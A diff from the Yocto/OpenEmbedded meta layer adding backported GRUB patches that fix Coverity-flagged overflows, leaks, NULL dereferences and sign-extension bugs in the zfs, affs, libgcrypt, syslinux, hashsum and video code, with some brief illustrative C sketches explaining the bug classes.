+ path = path_buf = grub_malloc (sym_sz + grub_strlen (oldpath) + 1);
+@@ -2911,7 +2920,8 @@ dnode_get_path (struct subvolume *subvol, const char *path_in, dnode_end_t *dn,
+ grub_free (oldpathbuf);
+ if (free_symval)
+ grub_free (sym_value);
+- return grub_errno;
++ err = grub_errno;
++ break;
+ }
+ grub_memcpy (path, sym_value, sym_sz);
+ if (free_symval)
+@@ -2949,11 +2959,12 @@ dnode_get_path (struct subvolume *subvol, const char *path_in, dnode_end_t *dn,
+
+ err = zio_read (bp, dnode_path->dn.endian, &sahdrp, NULL, data);
+ if (err)
+- return err;
++ break;
+ }
+ else
+ {
+- return grub_error (GRUB_ERR_BAD_FS, "filesystem is corrupt");
++ err = grub_error (GRUB_ERR_BAD_FS, "filesystem is corrupt");
++ break;
+ }
+
+ hdrsize = SA_HDR_SIZE (((sa_hdr_phys_t *) sahdrp));
+@@ -2974,7 +2985,8 @@ dnode_get_path (struct subvolume *subvol, const char *path_in, dnode_end_t *dn,
+ if (!path_buf)
+ {
+ grub_free (oldpathbuf);
+- return grub_errno;
++ err = grub_errno;
++ break;
+ }
+ grub_memcpy (path, sym_value, sym_sz);
+ path [sym_sz] = 0;
diff --git a/meta/recipes-bsp/grub/files/0023-zfs-Fix-possible-integer-overflows.patch b/meta/recipes-bsp/grub/files/0023-zfs-Fix-possible-integer-overflows.patch
new file mode 100644
index 0000000000..8df758b41f
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0023-zfs-Fix-possible-integer-overflows.patch
@@ -0,0 +1,56 @@
+From ec35d862f3567671048aa0d0d8ad1ded1fd25336 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Tue, 8 Dec 2020 22:17:04 +0000
+Subject: [PATCH] zfs: Fix possible integer overflows
+
+In all cases the problem is that the value being acted upon by
+a left-shift is a 32-bit number which is then being used in the
+context of a 64-bit number.
+
+To avoid overflow we ensure that the number being shifted is 64-bit
+before the shift is done.
+
+Fixes: CID 73684, CID 73695, CID 73764
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=302c12ff5714bc455949117c1c9548ccb324d55b]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/fs/zfs/zfs.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/grub-core/fs/zfs/zfs.c b/grub-core/fs/zfs/zfs.c
+index 9087a72..b078ccc 100644
+--- a/grub-core/fs/zfs/zfs.c
++++ b/grub-core/fs/zfs/zfs.c
+@@ -564,7 +564,7 @@ find_bestub (uberblock_phys_t * ub_array,
+ ubptr = (uberblock_phys_t *) ((grub_properly_aligned_t *) ub_array
+ + ((i << ub_shift)
+ / sizeof (grub_properly_aligned_t)));
+- err = uberblock_verify (ubptr, offset, 1 << ub_shift);
++ err = uberblock_verify (ubptr, offset, (grub_size_t) 1 << ub_shift);
+ if (err)
+ {
+ grub_errno = GRUB_ERR_NONE;
+@@ -1543,7 +1543,7 @@ read_device (grub_uint64_t offset, struct grub_zfs_device_desc *desc,
+
+ high = grub_divmod64 ((offset >> desc->ashift) + c,
+ desc->n_children, &devn);
+- csize = bsize << desc->ashift;
++ csize = (grub_size_t) bsize << desc->ashift;
+ if (csize > len)
+ csize = len;
+
+@@ -1635,8 +1635,8 @@ read_device (grub_uint64_t offset, struct grub_zfs_device_desc *desc,
+
+ while (len > 0)
+ {
+- grub_size_t csize;
+- csize = ((s / (desc->n_children - desc->nparity))
++ grub_size_t csize = s;
++ csize = ((csize / (desc->n_children - desc->nparity))
+ << desc->ashift);
+ if (csize > len)
+ csize = len;
diff --git a/meta/recipes-bsp/grub/files/0024-zfsinfo-Correct-a-check-for-error-allocating-memory.patch b/meta/recipes-bsp/grub/files/0024-zfsinfo-Correct-a-check-for-error-allocating-memory.patch
new file mode 100644
index 0000000000..555dc19168
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0024-zfsinfo-Correct-a-check-for-error-allocating-memory.patch
@@ -0,0 +1,35 @@
+From b085da8efda9b81f94aa197ee045226563554fdf Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 26 Nov 2020 10:56:45 +0000
+Subject: [PATCH] zfsinfo: Correct a check for error allocating memory
+
+While arguably the check for grub_errno is correct, we should really be
+checking the return value from the function since it is always possible
+that grub_errno was set elsewhere, making this code behave incorrectly.
+
+Fixes: CID 73668
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=7aab03418ec6a9b991aa44416cb2585aff4e7972]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/fs/zfs/zfsinfo.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/grub-core/fs/zfs/zfsinfo.c b/grub-core/fs/zfs/zfsinfo.c
+index c8a28ac..bf29180 100644
+--- a/grub-core/fs/zfs/zfsinfo.c
++++ b/grub-core/fs/zfs/zfsinfo.c
+@@ -358,8 +358,8 @@ grub_cmd_zfs_bootfs (grub_command_t cmd __attribute__ ((unused)), int argc,
+ return grub_error (GRUB_ERR_BAD_ARGUMENT, N_("one argument expected"));
+
+ devname = grub_file_get_device_name (args[0]);
+- if (grub_errno)
+- return grub_errno;
++ if (devname == NULL)
++ return GRUB_ERR_OUT_OF_MEMORY;
+
+ dev = grub_device_open (devname);
+ grub_free (devname);
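The wider point of this patch is that a global error indicator can still hold a value from an unrelated earlier call, whereas the function's own return value is unambiguous. A tiny sketch of the distinction; the errno-style flag and helper below are invented for illustration:

    #include <stdio.h>

    static int g_errno;   /* stand-in for a grub_errno-style global */

    static const char *
    get_device_name (const char *arg)
    {
      if (arg == NULL || *arg == '\0')
        {
          g_errno = 1;
          return NULL;
        }
      return "hd0";
    }

    int
    main (void)
    {
      g_errno = 7;         /* stale value left over from some earlier failure */
      const char *name = get_device_name ("(hd0,1)/boot");

      /* Testing g_errno here would wrongly report failure; testing the return
         value, as the backported fix does, gives the right answer.  */
      if (name == NULL)
        return 1;
      printf ("%s\n", name);
      return 0;
    }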
diff --git a/meta/recipes-bsp/grub/files/0025-affs-Fix-memory-leaks.patch b/meta/recipes-bsp/grub/files/0025-affs-Fix-memory-leaks.patch
new file mode 100644
index 0000000000..435130516c
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0025-affs-Fix-memory-leaks.patch
@@ -0,0 +1,82 @@
+From 929c2ce8214c53cb95abff57a89556cd18444097 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 26 Nov 2020 12:48:07 +0000
+Subject: [PATCH] affs: Fix memory leaks
+
+The node structure reference is being allocated but not freed if it
+reaches the end of the function. If any of the hooks had returned
+a non-zero value, then node would have been copied in to the context
+reference, but otherwise node is not stored and should be freed.
+
+Similarly, the call to grub_affs_create_node() replaces the allocated
+memory in node with a newly allocated structure, leaking the existing
+memory pointed to by node.
+
+Finally, when dir->parent is set, then we again replace node with newly
+allocated memory, which seems unnecessary when we copy in the values
+from dir->parent immediately after.
+
+Fixes: CID 73759
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=178ac5107389f8e5b32489d743d6824a5ebf342a]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/fs/affs.c | 18 ++++++++----------
+ 1 file changed, 8 insertions(+), 10 deletions(-)
+
+diff --git a/grub-core/fs/affs.c b/grub-core/fs/affs.c
+index 220b371..230e26a 100644
+--- a/grub-core/fs/affs.c
++++ b/grub-core/fs/affs.c
+@@ -400,12 +400,12 @@ grub_affs_iterate_dir (grub_fshelp_node_t dir,
+ {
+ unsigned int i;
+ struct grub_affs_file file;
+- struct grub_fshelp_node *node = 0;
++ struct grub_fshelp_node *node, *orig_node;
+ struct grub_affs_data *data = dir->data;
+ grub_uint32_t *hashtable;
+
+ /* Create the directory entries for `.' and `..'. */
+- node = grub_zalloc (sizeof (*node));
++ node = orig_node = grub_zalloc (sizeof (*node));
+ if (!node)
+ return 1;
+
+@@ -414,9 +414,6 @@ grub_affs_iterate_dir (grub_fshelp_node_t dir,
+ return 1;
+ if (dir->parent)
+ {
+- node = grub_zalloc (sizeof (*node));
+- if (!node)
+- return 1;
+ *node = *dir->parent;
+ if (hook ("..", GRUB_FSHELP_DIR, node, hook_data))
+ return 1;
+@@ -456,17 +453,18 @@ grub_affs_iterate_dir (grub_fshelp_node_t dir,
+
+ if (grub_affs_create_node (dir, hook, hook_data, &node, &hashtable,
+ next, &file))
+- return 1;
++ {
++ /* Node has been replaced in function. */
++ grub_free (orig_node);
++ return 1;
++ }
+
+ next = grub_be_to_cpu32 (file.next);
+ }
+ }
+
+- grub_free (hashtable);
+- return 0;
+-
+ fail:
+- grub_free (node);
++ grub_free (orig_node);
+ grub_free (hashtable);
+ return 0;
+ }
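The fix keeps a second pointer to the original allocation so it can still be freed after the working pointer has been overwritten. A condensed sketch of that idiom; the helper that swaps the node is hypothetical, standing in for grub_affs_create_node():

    #include <stdlib.h>

    struct node
    {
      int id;
    };

    /* May replace *node with a fresh allocation, like the real helper does.  */
    static int
    replace_node (struct node **node, int id)
    {
      struct node *fresh = malloc (sizeof (*fresh));
      if (fresh == NULL)
        return 1;
      fresh->id = id;
      *node = fresh;   /* caller's original allocation is now reachable only
                          through a pointer the caller kept separately */
      return 0;
    }

    int
    main (void)
    {
      struct node *node, *orig_node;

      node = orig_node = calloc (1, sizeof (*node));
      if (node == NULL)
        return 1;

      if (replace_node (&node, 42))
        {
          free (orig_node);   /* error path still frees the first allocation */
          return 1;
        }

      free (node);            /* the replacement */
      free (orig_node);       /* the original, tracked separately */
      return 0;
    }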
diff --git a/meta/recipes-bsp/grub/files/0026-libgcrypt-mpi-Fix-possible-unintended-sign-extension.patch b/meta/recipes-bsp/grub/files/0026-libgcrypt-mpi-Fix-possible-unintended-sign-extension.patch
new file mode 100644
index 0000000000..f500f1a296
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0026-libgcrypt-mpi-Fix-possible-unintended-sign-extension.patch
@@ -0,0 +1,36 @@
+From 9b16d7bcad1c7fea7f26eb2fb3af1a5ca70ba34e Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Tue, 3 Nov 2020 16:43:37 +0000
+Subject: [PATCH] libgcrypt/mpi: Fix possible unintended sign extension
+
+The array of unsigned char gets promoted to a signed 32-bit int before
+it is finally promoted to a size_t. There is the possibility that this
+may result in the signed-bit being set for the intermediate signed
+32-bit int. We should ensure that the promotion is to the correct type
+before we bitwise-OR the values.
+
+Fixes: CID 96697
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=e8814c811132a70f9b55418f7567378a34ad3883]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+
+---
+ grub-core/lib/libgcrypt/mpi/mpicoder.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/grub-core/lib/libgcrypt/mpi/mpicoder.c b/grub-core/lib/libgcrypt/mpi/mpicoder.c
+index a3435ed..7ecad27 100644
+--- a/grub-core/lib/libgcrypt/mpi/mpicoder.c
++++ b/grub-core/lib/libgcrypt/mpi/mpicoder.c
+@@ -458,7 +458,7 @@ gcry_mpi_scan (struct gcry_mpi **ret_mpi, enum gcry_mpi_format format,
+ if (len && len < 4)
+ return gcry_error (GPG_ERR_TOO_SHORT);
+
+- n = (s[0] << 24 | s[1] << 16 | s[2] << 8 | s[3]);
++ n = ((size_t)s[0] << 24 | (size_t)s[1] << 16 | (size_t)s[2] << 8 | (size_t)s[3]);
+ s += 4;
+ if (len)
+ len -= 4;
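The subtlety fixed here is that an unsigned char is promoted to signed int before the shift, so a leading byte of 0x80 or above drives the 32-bit intermediate negative (strictly, shifting into the sign bit is undefined), and widening that value to a 64-bit size_t then sign-extends it. A self-contained sketch of the effect:

    #include <stdint.h>
    #include <stdio.h>

    int
    main (void)
    {
      unsigned char s[4] = { 0xff, 0x00, 0x00, 0x01 };

      /* Promotion to signed int: on common compilers 0xff << 24 comes out
         negative, and assigning it to a 64-bit unsigned type sign-extends.  */
      uint64_t bad = (s[0] << 24 | s[1] << 16 | s[2] << 8 | s[3]);

      /* Casting each byte first keeps the whole expression unsigned 64-bit.  */
      uint64_t good = ((uint64_t) s[0] << 24 | (uint64_t) s[1] << 16
                       | (uint64_t) s[2] << 8 | (uint64_t) s[3]);

      printf ("bad  = 0x%llx\ngood = 0x%llx\n",
              (unsigned long long) bad, (unsigned long long) good);
      return 0;
    }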
diff --git a/meta/recipes-bsp/grub/files/0027-libgcrypt-mpi-Fix-possible-NULL-dereference.patch b/meta/recipes-bsp/grub/files/0027-libgcrypt-mpi-Fix-possible-NULL-dereference.patch
new file mode 100644
index 0000000000..08299d021e
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0027-libgcrypt-mpi-Fix-possible-NULL-dereference.patch
@@ -0,0 +1,33 @@
+From d26c8771293637b0465f2cb67d97cb58bacc62da Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 26 Nov 2020 10:41:54 +0000
+Subject: [PATCH] libgcrypt/mpi: Fix possible NULL dereference
+
+The code in gcry_mpi_scan() assumes that buffer is not NULL, but there
+is no explicit check for that, so we add one.
+
+Fixes: CID 73757
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=ae0f3fabeba7b393113d5dc185b6aff9b728136d]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/lib/libgcrypt/mpi/mpicoder.c | 3 +++
+ 1 file changed, 3 insertions(+)
+
+diff --git a/grub-core/lib/libgcrypt/mpi/mpicoder.c b/grub-core/lib/libgcrypt/mpi/mpicoder.c
+index 7ecad27..6fe3891 100644
+--- a/grub-core/lib/libgcrypt/mpi/mpicoder.c
++++ b/grub-core/lib/libgcrypt/mpi/mpicoder.c
+@@ -379,6 +379,9 @@ gcry_mpi_scan (struct gcry_mpi **ret_mpi, enum gcry_mpi_format format,
+ unsigned int len;
+ int secure = (buffer && gcry_is_secure (buffer));
+
++ if (!buffer)
++ return gcry_error (GPG_ERR_INV_ARG);
++
+ if (format == GCRYMPI_FMT_SSH)
+ len = 0;
+ else
diff --git a/meta/recipes-bsp/grub/files/0028-syslinux-Fix-memory-leak-while-parsing.patch b/meta/recipes-bsp/grub/files/0028-syslinux-Fix-memory-leak-while-parsing.patch
new file mode 100644
index 0000000000..d8c21d88f7
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0028-syslinux-Fix-memory-leak-while-parsing.patch
@@ -0,0 +1,43 @@
+From ea12feb69b6af93c7e2fa03df7ac3bd1f4edd599 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 26 Nov 2020 15:31:53 +0000
+Subject: [PATCH] syslinux: Fix memory leak while parsing
+
+In syslinux_parse_real() the 2 points where return is being called
+didn't release the memory stored in buf which is no longer required.
+
+Fixes: CID 176634
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=95bc016dba94cab3d398dd74160665915cd08ad6]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/lib/syslinux_parse.c | 6 +++++-
+ 1 file changed, 5 insertions(+), 1 deletion(-)
+
+diff --git a/grub-core/lib/syslinux_parse.c b/grub-core/lib/syslinux_parse.c
+index 4afa992..3acc6b4 100644
+--- a/grub-core/lib/syslinux_parse.c
++++ b/grub-core/lib/syslinux_parse.c
+@@ -737,7 +737,10 @@ syslinux_parse_real (struct syslinux_menu *menu)
+ && grub_strncasecmp ("help", ptr3, ptr4 - ptr3) == 0))
+ {
+ if (helptext (ptr5, file, menu))
+- return 1;
++ {
++ grub_free (buf);
++ return 1;
++ }
+ continue;
+ }
+
+@@ -757,6 +760,7 @@ syslinux_parse_real (struct syslinux_menu *menu)
+ }
+ fail:
+ grub_file_close (file);
++ grub_free (buf);
+ return err;
+ }
+
diff --git a/meta/recipes-bsp/grub/files/0029-normal-completion-Fix-leaking-of-memory-when-process.patch b/meta/recipes-bsp/grub/files/0029-normal-completion-Fix-leaking-of-memory-when-process.patch
new file mode 100644
index 0000000000..8a26e5bc5b
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0029-normal-completion-Fix-leaking-of-memory-when-process.patch
@@ -0,0 +1,52 @@
+From 2367049d2021e00d82d19cee923e06a4b04ebc30 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 4 Dec 2020 18:56:48 +0000
+Subject: [PATCH] normal/completion: Fix leaking of memory when processing a
+ completion
+
+It is possible for the code to reach the end of the function without
+freeing the memory allocated to argv while argc is still 0.
+
+We should always call grub_free(argv). The grub_free() will handle
+a NULL argument correctly if it reaches that code without the memory
+being allocated.
+
+Fixes: CID 96672
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=9213575b7a95b514bce80be5964a28d407d7d56d]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/normal/completion.c | 10 ++++------
+ 1 file changed, 4 insertions(+), 6 deletions(-)
+
+diff --git a/grub-core/normal/completion.c b/grub-core/normal/completion.c
+index 5961028..46e473c 100644
+--- a/grub-core/normal/completion.c
++++ b/grub-core/normal/completion.c
+@@ -400,8 +400,8 @@ char *
+ grub_normal_do_completion (char *buf, int *restore,
+ void (*hook) (const char *, grub_completion_type_t, int))
+ {
+- int argc;
+- char **argv;
++ int argc = 0;
++ char **argv = NULL;
+
+ /* Initialize variables. */
+ match = 0;
+@@ -516,10 +516,8 @@ grub_normal_do_completion (char *buf, int *restore,
+
+ fail:
+ if (argc != 0)
+- {
+- grub_free (argv[0]);
+- grub_free (argv);
+- }
++ grub_free (argv[0]);
++ grub_free (argv);
+ grub_free (match);
+ grub_errno = GRUB_ERR_NONE;
+
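The simplification leans on the usual contract that freeing a NULL pointer is a no-op, which is true of free() in standard C and, per the commit message, of grub_free() as well; initializing argv to NULL therefore lets one unconditional free replace the guarded block. A short sketch with an invented parse helper:

    #include <stdlib.h>
    #include <string.h>

    /* May or may not allocate *argv before failing; names are illustrative.  */
    static int
    parse_args (const char *buf, int *argc, char ***argv)
    {
      if (strchr (buf, ' ') == NULL)
        return 1;                          /* fail early: *argv stays NULL */

      *argv = calloc (2, sizeof (**argv));
      if (*argv == NULL)
        return 1;

      (*argv)[0] = malloc (strlen (buf) + 1);
      if ((*argv)[0] != NULL)
        strcpy ((*argv)[0], buf);
      *argc = 1;
      return 0;
    }

    int
    main (void)
    {
      int argc = 0;
      char **argv = NULL;                  /* initialized, as in the fix */

      parse_args ("boot", &argc, &argv);

      if (argc != 0)
        free (argv[0]);
      free (argv);                         /* safe even when argv is still NULL */
      return 0;
    }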
diff --git a/meta/recipes-bsp/grub/files/0030-commands-hashsum-Fix-a-memory-leak.patch b/meta/recipes-bsp/grub/files/0030-commands-hashsum-Fix-a-memory-leak.patch
new file mode 100644
index 0000000000..e34a19e12c
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0030-commands-hashsum-Fix-a-memory-leak.patch
@@ -0,0 +1,56 @@
+From b136fa14d26d1833ffcb852f86e65da5960cfb99 Mon Sep 17 00:00:00 2001
+From: Chris Coulson <chris.coulson@canonical.com>
+Date: Tue, 1 Dec 2020 23:41:24 +0000
+Subject: [PATCH] commands/hashsum: Fix a memory leak
+
+check_list() uses grub_file_getline(), which allocates a buffer.
+If the hash list file contains invalid lines, the function leaks
+this buffer when it returns an error.
+
+Fixes: CID 176635
+
+Signed-off-by: Chris Coulson <chris.coulson@canonical.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=8b6f528e52e18b7a69f90b8dc3671d7b1147d9f3]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/commands/hashsum.c | 15 ++++++++++++---
+ 1 file changed, 12 insertions(+), 3 deletions(-)
+
+diff --git a/grub-core/commands/hashsum.c b/grub-core/commands/hashsum.c
+index 456ba90..b8a22b0 100644
+--- a/grub-core/commands/hashsum.c
++++ b/grub-core/commands/hashsum.c
+@@ -128,11 +128,17 @@ check_list (const gcry_md_spec_t *hash, const char *hashfilename,
+ high = hextoval (*p++);
+ low = hextoval (*p++);
+ if (high < 0 || low < 0)
+- return grub_error (GRUB_ERR_BAD_FILE_TYPE, "invalid hash list");
++ {
++ grub_free (buf);
++ return grub_error (GRUB_ERR_BAD_FILE_TYPE, "invalid hash list");
++ }
+ expected[i] = (high << 4) | low;
+ }
+ if ((p[0] != ' ' && p[0] != '\t') || (p[1] != ' ' && p[1] != '\t'))
+- return grub_error (GRUB_ERR_BAD_FILE_TYPE, "invalid hash list");
++ {
++ grub_free (buf);
++ return grub_error (GRUB_ERR_BAD_FILE_TYPE, "invalid hash list");
++ }
+ p += 2;
+ if (prefix)
+ {
+@@ -140,7 +146,10 @@ check_list (const gcry_md_spec_t *hash, const char *hashfilename,
+
+ filename = grub_xasprintf ("%s/%s", prefix, p);
+ if (!filename)
+- return grub_errno;
++ {
++ grub_free (buf);
++ return grub_errno;
++ }
+ file = grub_file_open (filename, GRUB_FILE_TYPE_TO_HASH
+ | (!uncompress ? GRUB_FILE_TYPE_NO_DECOMPRESS
+ : GRUB_FILE_TYPE_NONE));
diff --git a/meta/recipes-bsp/grub/files/0031-video-efi_gop-Remove-unnecessary-return-value-of-gru.patch b/meta/recipes-bsp/grub/files/0031-video-efi_gop-Remove-unnecessary-return-value-of-gru.patch
new file mode 100644
index 0000000000..7e4e951245
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0031-video-efi_gop-Remove-unnecessary-return-value-of-gru.patch
@@ -0,0 +1,94 @@
+From 2a1e5659763790201a342f8a897c8c9d8d91b1cc Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Tue, 8 Dec 2020 21:14:31 +0000
+Subject: [PATCH] video/efi_gop: Remove unnecessary return value of
+ grub_video_gop_fill_mode_info()
+
+The return value of grub_video_gop_fill_mode_info() is never able to be
+anything other than GRUB_ERR_NONE. So, rather than continue to return
+a value and checking it each time, it is more correct to redefine the
+function to not return anything and remove checks of its return value
+altogether.
+
+Fixes: CID 96701
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=fc5951d3b1616055ef81a019a5affc09d13344d0]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/video/efi_gop.c | 25 ++++++-------------------
+ 1 file changed, 6 insertions(+), 19 deletions(-)
+
+diff --git a/grub-core/video/efi_gop.c b/grub-core/video/efi_gop.c
+index 7f9d1c2..db2ee98 100644
+--- a/grub-core/video/efi_gop.c
++++ b/grub-core/video/efi_gop.c
+@@ -227,7 +227,7 @@ grub_video_gop_fill_real_mode_info (unsigned mode,
+ return GRUB_ERR_NONE;
+ }
+
+-static grub_err_t
++static void
+ grub_video_gop_fill_mode_info (unsigned mode,
+ struct grub_efi_gop_mode_info *in,
+ struct grub_video_mode_info *out)
+@@ -252,8 +252,6 @@ grub_video_gop_fill_mode_info (unsigned mode,
+ out->blit_format = GRUB_VIDEO_BLIT_FORMAT_BGRA_8888;
+ out->mode_type |= (GRUB_VIDEO_MODE_TYPE_DOUBLE_BUFFERED
+ | GRUB_VIDEO_MODE_TYPE_UPDATING_SWAP);
+-
+- return GRUB_ERR_NONE;
+ }
+
+ static int
+@@ -266,7 +264,6 @@ grub_video_gop_iterate (int (*hook) (const struct grub_video_mode_info *info, vo
+ grub_efi_uintn_t size;
+ grub_efi_status_t status;
+ struct grub_efi_gop_mode_info *info = NULL;
+- grub_err_t err;
+ struct grub_video_mode_info mode_info;
+
+ status = efi_call_4 (gop->query_mode, gop, mode, &size, &info);
+@@ -277,12 +274,7 @@ grub_video_gop_iterate (int (*hook) (const struct grub_video_mode_info *info, vo
+ continue;
+ }
+
+- err = grub_video_gop_fill_mode_info (mode, info, &mode_info);
+- if (err)
+- {
+- grub_errno = GRUB_ERR_NONE;
+- continue;
+- }
++ grub_video_gop_fill_mode_info (mode, info, &mode_info);
+ if (hook (&mode_info, hook_arg))
+ return 1;
+ }
+@@ -466,13 +458,8 @@ grub_video_gop_setup (unsigned int width, unsigned int height,
+
+ info = gop->mode->info;
+
+- err = grub_video_gop_fill_mode_info (gop->mode->mode, info,
+- &framebuffer.mode_info);
+- if (err)
+- {
+- grub_dprintf ("video", "GOP: couldn't fill mode info\n");
+- return err;
+- }
++ grub_video_gop_fill_mode_info (gop->mode->mode, info,
++ &framebuffer.mode_info);
+
+ framebuffer.ptr = (void *) (grub_addr_t) gop->mode->fb_base;
+ framebuffer.offscreen
+@@ -486,8 +473,8 @@ grub_video_gop_setup (unsigned int width, unsigned int height,
+ {
+ grub_dprintf ("video", "GOP: couldn't allocate shadow\n");
+ grub_errno = 0;
+- err = grub_video_gop_fill_mode_info (gop->mode->mode, info,
+- &framebuffer.mode_info);
++ grub_video_gop_fill_mode_info (gop->mode->mode, info,
++ &framebuffer.mode_info);
+ buffer = framebuffer.ptr;
+ }
+
diff --git a/meta/recipes-bsp/grub/files/0032-video-fb-fbfill-Fix-potential-integer-overflow.patch b/meta/recipes-bsp/grub/files/0032-video-fb-fbfill-Fix-potential-integer-overflow.patch
new file mode 100644
index 0000000000..8165ea3f71
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0032-video-fb-fbfill-Fix-potential-integer-overflow.patch
@@ -0,0 +1,78 @@
+From 99ecf5a44b99d529a6405fe276bedcefa3657a0a Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Wed, 4 Nov 2020 15:10:51 +0000
+Subject: [PATCH] video/fb/fbfill: Fix potential integer overflow
+
+The multiplication of 2 unsigned 32-bit integers may overflow before
+promotion to unsigned 64-bit. We should ensure that the multiplication
+is done with overflow detection. Additionally, use grub_sub() for
+subtraction.
+
+Fixes: CID 73640, CID 73697, CID 73702, CID 73823
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Signed-off-by: Marco A Benatto <mbenatto@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=7ce3259f67ac2cd93acb0ec0080c24b3b69e66c6]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/video/fb/fbfill.c | 17 +++++++++++++----
+ 1 file changed, 13 insertions(+), 4 deletions(-)
+
+diff --git a/grub-core/video/fb/fbfill.c b/grub-core/video/fb/fbfill.c
+index 11816d0..a37acd1 100644
+--- a/grub-core/video/fb/fbfill.c
++++ b/grub-core/video/fb/fbfill.c
+@@ -31,6 +31,7 @@
+ #include <grub/fbfill.h>
+ #include <grub/fbutil.h>
+ #include <grub/types.h>
++#include <grub/safemath.h>
+ #include <grub/video.h>
+
+ /* Generic filler that works for every supported mode. */
+@@ -61,7 +62,9 @@ grub_video_fbfill_direct32 (struct grub_video_fbblit_info *dst,
+
+ /* Calculate the number of bytes to advance from the end of one line
+ to the beginning of the next line. */
+- rowskip = dst->mode_info->pitch - dst->mode_info->bytes_per_pixel * width;
++ if (grub_mul (dst->mode_info->bytes_per_pixel, width, &rowskip) ||
++ grub_sub (dst->mode_info->pitch, rowskip, &rowskip))
++ return;
+
+ /* Get the start address. */
+ dstptr = grub_video_fb_get_video_ptr (dst, x, y);
+@@ -98,7 +101,9 @@ grub_video_fbfill_direct24 (struct grub_video_fbblit_info *dst,
+ #endif
+ /* Calculate the number of bytes to advance from the end of one line
+ to the beginning of the next line. */
+- rowskip = dst->mode_info->pitch - dst->mode_info->bytes_per_pixel * width;
++ if (grub_mul (dst->mode_info->bytes_per_pixel, width, &rowskip) ||
++ grub_sub (dst->mode_info->pitch, rowskip, &rowskip))
++ return;
+
+ /* Get the start address. */
+ dstptr = grub_video_fb_get_video_ptr (dst, x, y);
+@@ -131,7 +136,9 @@ grub_video_fbfill_direct16 (struct grub_video_fbblit_info *dst,
+
+ /* Calculate the number of bytes to advance from the end of one line
+ to the beginning of the next line. */
+- rowskip = (dst->mode_info->pitch - dst->mode_info->bytes_per_pixel * width);
++ if (grub_mul (dst->mode_info->bytes_per_pixel, width, &rowskip) ||
++ grub_sub (dst->mode_info->pitch, rowskip, &rowskip))
++ return;
+
+ /* Get the start address. */
